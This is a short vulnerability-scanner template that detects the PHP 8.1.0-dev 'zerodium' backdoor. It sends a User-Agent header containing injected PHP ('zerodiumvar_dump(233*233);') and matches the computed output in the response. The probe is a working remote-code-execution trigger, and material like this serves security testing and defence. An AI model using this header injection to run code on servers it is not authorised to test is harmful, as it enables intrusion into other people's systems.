id: php-zerodium-backdoor-rce

info:
  name: PHP 8.1.0-dev - Backdoor Remote Code Execution
  author: dhiyaneshDk
  severity: critical
  description: PHP 8.1.0-dev contains a backdoor dubbed 'zerodiumvar_dump' which can allow the execution of arbitrary PHP code.
  reference:
    - https://news-web.php.net/php.internals/113838
    - https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id:
    cwe-id: CWE-77
  tags: php,backdoor

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      User-Agent: zerodiumvar_dump(233*233);

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "int(54289)"
        part: body

# Enhanced by mp on 2022/05/30